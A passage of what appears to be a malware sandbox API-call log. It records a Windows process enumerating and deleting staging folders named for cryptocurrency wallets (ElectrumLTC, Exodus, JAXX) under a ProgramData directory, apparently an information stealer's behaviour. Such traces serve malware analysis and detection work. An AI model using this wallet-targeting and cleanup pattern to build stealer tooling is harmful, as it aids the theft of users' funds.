lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC" [0116.520] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC\\" [0116.520] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC\\.." [0116.520] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\ElectrumLTC" | out: lpString1="\\Wallets\\ElectrumLTC") returned="\\Wallets\\ElectrumLTC" [0116.520] lstrcatW (in: lpString1="\\Wallets\\ElectrumLTC", lpString2="\\" | out: lpString1="\\Wallets\\ElectrumLTC\\") returned="\\Wallets\\ElectrumLTC\\" [0116.521] lstrcatW (in: lpString1="\\Wallets\\ElectrumLTC\\", lpString2=".." | out: lpString1="\\Wallets\\ElectrumLTC\\..") returned="\\Wallets\\ElectrumLTC\\.." [0116.521] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.521] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.521] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632d616, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632d616, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632d616, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.521] FindClose (in: hFindFile=0x7437e0 | out: hFindFile=0x7437e0) returned 1 [0116.521] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970048 [0116.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0116.521] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x43) returned 0x38eb608 [0116.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC", cchWideChar=67, lpMultiByteStr=0x38eb608, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC", lpUsedDefaultChar=0x0) returned 67 [0116.521] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaf20 [0116.521] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb608 | out: hHeap=0x29a0000) returned 1 [0116.521] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.521] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a69d8 [0116.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a69d8, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.521] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69d8 | out: hHeap=0x29a0000) returned 1 [0116.521] PathMatchSpecW (pszFile="ElectrumLTC", pszSpec="*.*") returned 1 [0116.521] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970048 [0116.521] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700e0 [0116.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0116.521] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x43) returned 0x38eb5b8 [0116.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC", cchWideChar=67, lpMultiByteStr=0x38eb5b8, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC", lpUsedDefaultChar=0x0) returned 67 [0116.521] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eac08 [0116.521] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb5b8 | out: hHeap=0x29a0000) returned 1 [0116.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\ElectrumLTC", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.521] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x15) returned 0x3970ba0 [0116.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\ElectrumLTC", cchWideChar=21, lpMultiByteStr=0x3970ba0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Wallets\\ElectrumLTC", lpUsedDefaultChar=0x0) returned 21 [0116.522] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706f0 [0116.522] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ba0 | out: hHeap=0x29a0000) returned 1 [0116.522] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\electrumltc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.522] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706f0 | out: hHeap=0x29a0000) returned 1 [0116.522] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eac08 | out: hHeap=0x29a0000) returned 1 [0116.522] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700e0 | out: hHeap=0x29a0000) returned 1 [0116.522] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.522] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\electrumltc")) returned 0 [0116.522] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaf20 | out: hHeap=0x29a0000) returned 1 [0116.522] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632d616, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632d616, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632d616, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Exodus", cAlternateFileName="")) returned 1 [0116.522] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.522] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\" [0116.522] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\", lpString2="Exodus" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus" [0116.522] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.522] lstrcatW (in: lpString1="\\Wallets", lpString2="\\" | out: lpString1="\\Wallets\\") returned="\\Wallets\\" [0116.522] lstrcatW (in: lpString1="\\Wallets\\", lpString2="Exodus" | out: lpString1="\\Wallets\\Exodus") returned="\\Wallets\\Exodus" [0116.522] lstrcmpW (lpString1="Exodus", lpString2=".") returned 1 [0116.522] lstrcmpW (lpString1="Exodus", lpString2="..") returned 1 [0116.522] lstrcpyW (in: lpString1=0x19e198, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus" [0116.522] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus\\*.*" [0116.522] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus\\*.*", lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632d616, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632d616, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632d616, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0116.523] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus" [0116.523] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus\\" [0116.523] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus\\." [0116.523] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Exodus" | out: lpString1="\\Wallets\\Exodus") returned="\\Wallets\\Exodus" [0116.523] lstrcatW (in: lpString1="\\Wallets\\Exodus", lpString2="\\" | out: lpString1="\\Wallets\\Exodus\\") returned="\\Wallets\\Exodus\\" [0116.523] lstrcatW (in: lpString1="\\Wallets\\Exodus\\", lpString2="." | out: lpString1="\\Wallets\\Exodus\\.") returned="\\Wallets\\Exodus\\." [0116.523] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.523] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632d616, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632d616, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632d616, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.523] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus" [0116.523] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus\\" [0116.523] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus\\.." [0116.523] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Exodus" | out: lpString1="\\Wallets\\Exodus") returned="\\Wallets\\Exodus" [0116.523] lstrcatW (in: lpString1="\\Wallets\\Exodus", lpString2="\\" | out: lpString1="\\Wallets\\Exodus\\") returned="\\Wallets\\Exodus\\" [0116.523] lstrcatW (in: lpString1="\\Wallets\\Exodus\\", lpString2=".." | out: lpString1="\\Wallets\\Exodus\\..") returned="\\Wallets\\Exodus\\.." [0116.523] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.523] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.523] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632d616, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632d616, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632d616, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.523] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0116.523] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a9320 [0116.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0116.523] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2c00 [0116.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus", cchWideChar=62, lpMultiByteStr=0x29a2c00, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus", lpUsedDefaultChar=0x0) returned 62 [0116.523] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2f18 [0116.524] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0116.524] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a9320 | out: hHeap=0x29a0000) returned 1 [0116.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.524] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6898 [0116.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a6898, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.524] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6898 | out: hHeap=0x29a0000) returned 1 [0116.524] PathMatchSpecW (pszFile="Exodus", pszSpec="*.*") returned 1 [0116.524] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a93a8 [0116.524] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703f8 [0116.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0116.524] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2db0 [0116.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus", cchWideChar=62, lpMultiByteStr=0x29a2db0, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus", lpUsedDefaultChar=0x0) returned 62 [0116.524] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a29c0 [0116.524] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2db0 | out: hHeap=0x29a0000) returned 1 [0116.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Exodus", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.524] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaae0 [0116.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Exodus", cchWideChar=16, lpMultiByteStr=0x29aaae0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Wallets\\Exodus", lpUsedDefaultChar=0x0) returned 16 [0116.524] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaae0 | out: hHeap=0x29a0000) returned 1 [0116.524] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\exodus"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.524] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0116.524] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703f8 | out: hHeap=0x29a0000) returned 1 [0116.524] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a93a8 | out: hHeap=0x29a0000) returned 1 [0116.524] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Exodus" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\exodus")) returned 0 [0116.524] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2f18 | out: hHeap=0x29a0000) returned 1 [0116.524] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633d3a8, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633d3a8, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633d3a8, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JAXX", cAlternateFileName="")) returned 1 [0116.525] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.525] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\" [0116.525] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\", lpString2="JAXX" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX" [0116.525] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.525] lstrcatW (in: lpString1="\\Wallets", lpString2="\\" | out: lpString1="\\Wallets\\") returned="\\Wallets\\" [0116.525] lstrcatW (in: lpString1="\\Wallets\\", lpString2="JAXX" | out: lpString1="\\Wallets\\JAXX") returned="\\Wallets\\JAXX" [0116.525] lstrcmpW (lpString1="JAXX", lpString2=".") returned 1 [0116.525] lstrcmpW (lpString1="JAXX", lpString2="..") returned 1 [0116.525] lstrcpyW (in: lpString1=0x19e198, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX" [0116.525] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX\\*.*" [0116.525] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX\\*.*", lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633d3a8, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633d3a8, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633d3a8, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0116.525] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX" [0116.525] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX\\" [0116.525] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX\\." [0116.525] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\JAXX" | out: lpString1="\\Wallets\\JAXX") returned="\\Wallets\\JAXX" [0116.525] lstrcatW (in: lpString1="\\Wallets\\JAXX", lpString2="\\" | out: lpString1="\\Wallets\\JAXX\\") returned="\\Wallets\\JAXX\\" [0116.525] lstrcatW (in: lpString1="\\Wallets\\JAXX\\", lpString2="." | out: lpString1="\\Wallets\\JAXX\\.") returned="\\Wallets\\JAXX\\." [0116.525] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.525] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633d3a8, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633d3a8, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633d3a8, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.525] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX" [0116.525] lstrcatW (in: 